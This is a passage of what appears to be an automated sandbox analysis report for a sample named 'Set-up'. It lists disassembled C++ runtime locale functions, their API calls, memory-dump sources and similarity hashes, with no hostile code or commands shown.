                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EDEC,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3A372
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EDEC,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3A389
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3A392
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$codecvt@_WDH@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3EDEC,?,0000000C,6BC3962C,?,?,?,?,?,?,?), ref: 6BC3A3AC
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EDEC,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC3A3C0
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3A3CF
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EDEC,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3A3DF
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3A3E5
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EDEC,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3A3F2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_Getcat@?$codecvt@_GetfacetGetgloballocale@locale@std@@H@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowV42@@Vfacet@locale@2@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 576096907-3145022300
                                                                                              • Opcode ID: 2ac553cbdb3478414d39053b82a2da3ab61c663cdcb64f4a2b9696c479561cd1
                                                                                              • Instruction ID: 291bfe75779709353436c29e4a0e745770236c943dc871878d31b1b1fd7f70c9
                                                                                              • Opcode Fuzzy Hash: 2ac553cbdb3478414d39053b82a2da3ab61c663cdcb64f4a2b9696c479561cd1
                                                                                              • Instruction Fuzzy Hash: 6601A1329355299BCF05DBB4C852AADB3356F81724F900528E1207B2A0FB3CDB01DB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3D381
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F2F9,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3D38B
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F2F9,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3D3A2
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3D3AB
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$time_get@GV?$istreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3F2F9,?,0000000C,6BC39639,?,?,?,?,?,?,?), ref: 6BC3D3C5
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F2F9,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC3D3D9
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3D3E8
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F2F9,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3D3F8
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3D3FE
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F2F9,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3D40B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_G@std@@@std@@@std@@Getcat@?$time_get@GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowU?$char_traits@V42@@V?$istreambuf_iterator@Vfacet@locale@2@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 984978972-3145022300
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3D2DE
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F287,?), ref: 6BC3D2E8
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F287,?), ref: 6BC3D2FF
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3D308
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • moneypunct.LIBCPMT ref: 6BC3D322
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F287,?), ref: 6BC3D336
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3D345
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F287,?), ref: 6BC3D355
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3D35B
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F287,?), ref: 6BC3D368
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmoneypunctstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 3875917587-3145022300
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT(?,?,00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?), ref: 6BC26322
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC26336
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC26345
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26355
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC2635B
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1E305
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3945B,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC1E30F
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3945B,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC1E326
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC1E32F
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3945B,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58), ref: 6BC1E349
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3945B,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?), ref: 6BC1E35D
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC1E36C
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3945B,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC1E37C
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC1E382
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3945B,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC1E38F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@D@std@@ExceptionFacet_Getcat@?$ctype@GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowV42@@Vfacet@locale@2@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 3833770082-3145022300
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC4128D
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC41297
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC412AE
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC412B7
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?), ref: 6BC412D1
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F), ref: 6BC412E5
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC412F4
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC41304
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC4130A
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC41317
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@D@std@@@std@@@std@@ExceptionFacet_Getcat@?$time_put@GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowU?$char_traits@V42@@V?$ostreambuf_iterator@Vfacet@locale@2@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 316688439-3145022300
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT(?,?,00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?), ref: 6BC2627F
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC26293
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC262A2
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262B2
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC262B8
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3D23B
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F205,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3D245
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F205,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3D25C
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3D265
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • moneypunct.LIBCPMT ref: 6BC3D27F
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F205,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC3D293
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3D2A2
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F205,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3D2B2
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3D2B8
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F205,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3D2C5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmoneypunctstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 3875917587-3145022300
                                                                                              • Opcode ID: dd7586fb4edab2335d4e92d22c72b66e7a7e7e66cc47fb1d86f65958d5580b3c
                                                                                              • Instruction ID: 7f80d38b4503498991f77005c722160d5eb7200e0de37130348fbe06107cd658
                                                                                              • Opcode Fuzzy Hash: dd7586fb4edab2335d4e92d22c72b66e7a7e7e66cc47fb1d86f65958d5580b3c
                                                                                              • Instruction Fuzzy Hash: B901A13192062997CF05DBB0C8526EE7331AF81725F940168E420BB290FB3CDB019B61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC411EA
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC41A83,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC411F4
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC41A83,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC4120B
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC41214
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT ref: 6BC4122E
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC41A83,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F), ref: 6BC41242
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC41251
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC41A83,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC41261
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC41267
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC41A83,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC41274
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: 2ebc01559286f80f08e2658f8b97c824f25eb4cf4c43cceec9b2afd93b19c150
                                                                                              • Instruction ID: 4f94a88126b9d14d57160f3d305a22d661e96c38b992b0c32d440df059d3561e
                                                                                              • Opcode Fuzzy Hash: 2ebc01559286f80f08e2658f8b97c824f25eb4cf4c43cceec9b2afd93b19c150
                                                                                              • Instruction Fuzzy Hash: 9C01A1319246299BCF15DFB4C852AAE7735BF81729F540128E161FB2D0FB3C9B019B61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3D198
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3D1A2
